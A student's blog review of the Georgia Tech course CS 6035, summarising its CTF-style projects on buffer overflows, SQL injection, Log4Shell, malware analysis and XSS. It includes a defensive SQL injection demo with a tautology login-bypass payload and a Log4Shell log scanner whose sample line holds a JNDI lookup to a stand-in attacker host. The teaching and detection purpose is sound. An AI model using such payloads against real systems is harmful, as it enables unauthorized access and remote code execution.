CS 6035: Introduction to Information Security

OMSCS 2nd lecture

As my second course in OMSCS, I took “Introduction to Information Security” in the 2024 Summer semester, where I learned about information security through project-based assignments. I was able to study vulnerabilities and attack techniques such as Binary Exploitation, SQL Injection, Man in the Middle, and Log4Shell.

Overall

In my second class of OMSCS, I enrolled in “Introduction to Information Security” (IIS), where various topics related to information security were taught in a project format. Due to the shorter duration of the summer semester compared to spring and fall semesters, some classes had tighter deadlines and were more demanding. Therefore, since this was my first summer semester, I chose a course with a lighter workload. The assignments were essentially in a format similar to Capture the Flag (CTF), where we exploited vulnerabilities to obtain and submit flags. While past lecture videos were shared, they were not updated to match the assignments and there were no tests, so it was suggested that we could skip watching them. Consequently, I focused on the assignments for each topic, researching any unclear areas as I progressed.

During the 2024 Summer semester, I worked on assignments related to the following topics each week and practiced attack techniques using the VMs provided in the lectures. These attack methods were learned for the purpose of enhancing security, not for actual attacks, and the introduction of these methods here is intended to raise awareness of such attacks.

Binary Exploitation

Using a vulnerable program written in C, I performed Binary Exploitation to obtain flags. Buffer Overflow, one form of Binary Exploitation, exploits input handling that does not check the length of the input, so that the input overwrites adjacent memory and causes unintended execution. By debugging with gdb, I was able to learn about C pointers and assembly. To generate the payloads that trigger the exploit, I used the Python library Pwntools.

Reference: Buffer Overflow

API Security

This section involved obtaining flags by exploiting various vulnerabilities in a sample API system. Using tools such as Swagger and Postman, I became familiar with changing API parameters. Some tasks required rewriting JWTs (JSON Web Tokens), which was a good opportunity to deepen my understanding of JWT.

Database Security

The project covered Database Inference Attacks and SQL Injection. For Database Inference Attacks, I re-identified anonymized records in the sample data by linking them with publicly available information from the web. For SQL Injection, I made the application execute unauthorized SQL queries in order to read or update data it was not intended to expose, thereby obtaining flags.

Reference: SQL injection
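To show concretely what "executing unauthorized SQL queries from the application" means, here is an added example (not code from the course) of a login lookup written two ways against an in-memory SQLite table with constructed sample rows: a string-built query that a single quote in the input can reshape, beside the parameterized form that closes the hole.

```python
"""Added example: injectable vs. parameterized SQL in Python's sqlite3.
The users table and its rows are constructed for the demo; passwords are
stored in plaintext only to keep the example short."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throwaway users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """BAD: user input is concatenated into the SQL text, so a quote in the
    input ends the string literal and the rest is parsed as SQL."""
    sql = (f"SELECT username, role FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """GOOD: placeholders send the values separately from the SQL text; the
    database engine never parses the input as part of the query."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Constructed input: the quote closes the password literal, and the
    # trailing OR makes the WHERE clause true for every row.
    tampered = "' OR '1'='1"
    print(login_vulnerable(db, "nobody", tampered))  # every user is returned
    print(login_safe(db, "nobody", tampered))        # [] : treated as a literal password
```

The same input that dumps every row from the vulnerable function is just an unmatched password string for the parameterized one, which is why parameterization, not input filtering, is the primary fix.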

RSA Cryptography

This project focused mainly on RSA cryptography, which is categorized as a public-key cryptosystem, and involved tasks related to breaking encryption. Since RSA is based on mathematics, a solid understanding of mathematical concepts was necessary to comprehend its vulnerabilities. Learning about the principles of how RSA encryption works and what vulnerabilities exist was beneficial, especially given its widespread use in real-world applications.

Reference: What is RSA Cryptography? A Beginner’s Guide to Its Mechanism and Applications

Malware Analysis

In this project, I reviewed reports from the malware analysis tool JoeSandboxCloud and analyzed the malicious behavior of specific programs. The reports focused on CVE-2022-30190, Mirai, Nanocore, Emotet, and AgentTesla, and by examining them, I was able to observe how Windows APIs and the registry were manipulated, allowing me to answer related questions.
Reference: JoeSandboxCloud
Researching the behaviors of each malware beforehand helped as I read through the reports.
CVE-2022-30190
Mirai
Nanocore
Emotet
AgentTesla

Log4Shell

I also learned about Log4Shell, which gained significant attention in 2021, through this project. Log4Shell is the name given to a vulnerability in the JNDI (Java Naming and Directory Interface) lookup feature of the Java logging library Log4j; because it allowed Remote Code Execution (RCE), it drew considerable interest. I built an LDAP Server in a virtual environment and exploited this vulnerability to execute a malicious Java class on a web application, obtaining a flag.
Reference: Verification Report on RCE Vulnerability in Apache Log4j (CVE-2021-44228)
By following the resources provided, I was able to set up the environment, including the LDAP Server, and deepen my understanding of Log4Shell. The explanatory videos were also helpful as I progressed through the assignments.
References: Solar, Exploiting Log4j; Log4J - CVE 2021-44228 (Log4Shell) - Exploitation & Mitigation
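From the defender's side, the JNDI lookup described above leaves a recognizable trace in whatever field the application logged. As an added example (not code from the course or from Log4j), the following scans constructed access-log lines for JNDI lookup strings, extracts the callback host for triage, and separately flags nested lookups, since Log4j resolves inner lookups before the outer one and the keyword may not be visible in the raw line.

```python
"""Added example: detect Log4j JNDI lookup strings (CVE-2021-44228) in log lines.
The log lines and the host attacker.example are constructed for the demo.
Scanning logs only finds attempts; the fix is upgrading or patching Log4j."""
import re
from typing import List, Optional

# A JNDI lookup in a logged field looks like ${jndi:<scheme>://<host>[:port]/...}.
# Log4j accepts several JNDI schemes; matching is case-insensitive.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|nis)"
    r"\s*:\s*//\s*(?P<host>[^/:}\s]+)",
    re.IGNORECASE,
)
# A lookup whose body contains another ${...} lookup is resolved inside-out by
# Log4j, so flag any nesting even when "jndi" does not appear literally.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def inspect_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it looks clean."""
    m = JNDI_RE.search(line)
    if m:
        return {"verdict": "jndi-lookup",
                "scheme": m.group("scheme").lower(),
                "host": m.group("host")}
    if NESTED_RE.search(line):
        return {"verdict": "nested-lookup", "scheme": None, "host": None}
    return None


def scan(lines: List[str]) -> List[dict]:
    """Scan a list of log lines; each finding carries its 1-based line number."""
    findings = []
    for n, line in enumerate(lines, 1):
        hit = inspect_line(line)
        if hit:
            hit["line"] = n
            findings.append(hit)
    return findings


SAMPLE_LOG = [  # constructed access-log style lines (User-Agent quoted last)
    '10.0.0.7 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${${env:TERM}:x}"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The extracted host is what a responder would block at the egress firewall and search for in DNS and LDAP connection logs; a nested-lookup hit is lower confidence and needs manual review.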

Man in the Middle

In this project, the background scenario was that I had intercepted the communications of a hacker group and was analyzing their exchanges. A pcap file containing the captured traffic between the hackers was provided. I analyzed it with Wireshark and Pyshark, observing how the hackers connected over different protocols such as TCP/IP, FTP, HTTP, and IRC, examined the packet details in that context, and read the content of the communication. Since the analysis required understanding each protocol, I learned how each one establishes a connection.
Reference: What is a Man-in-the-Middle Attack (MITM)?

Machine Learning

In this project, I classified malware using machine learning. The project started with necessary preprocessing tasks like One-Hot Encoding and Feature Engineering. I primarily used sklearn to perform classification using K-means, Logistic Regression, Random Forest, and Gradient Boosting. Additionally, since this was a classification task, I learned to calculate evaluation metrics like ROC from the basics. This project provided a good opportunity to experience the entire process from data preprocessing to prediction and evaluation using machine learning. Ultimately, I was required to classify using the following malware dataset and achieve a certain ROC threshold.
Reference: ClaMP (Classification of Malware with PE headers)

Web Security

This project focused on Cross-Site Scripting (XSS). Previously, it was an Extra Credit (grade remediation) project, but it seems it has now become a required project. However, since it was my final project and I was almost guaranteed an A, I only completed 1/4 of it, resulting in the lowest score among all projects so far. My lack of experience with frontend technologies like HTML and JavaScript contributed significantly to my struggle.
Reference: What is Cross-Site Scripting (XSS)? An Easy-to-Understand Explanation of the Attack Mechanism and Countermeasures

Reflection

SQL Injection and Man in the Middle are vulnerabilities I had heard of before, but I was not familiar with the actual steps involved in carrying out such attacks. Through these assignments, I was able to gain a deeper understanding by attempting the attacks in a virtual environment. By putting myself in the attackers’ shoes, I was better able to envision how to strengthen security from various perspectives, which was a significant takeaway.

Throughout this course, the wide array of topics, such as assembly, debuggers, SQL, Java, networks, and web technologies, provided a good introductory framework. I plan to take courses in networking and operating systems in the future, and I believe this was a beneficial first step. Personally, I found the Binary Exploitation project the most interesting, as it deepened my understanding of assembly.

Licensed under CC BY-NC-SA 4.0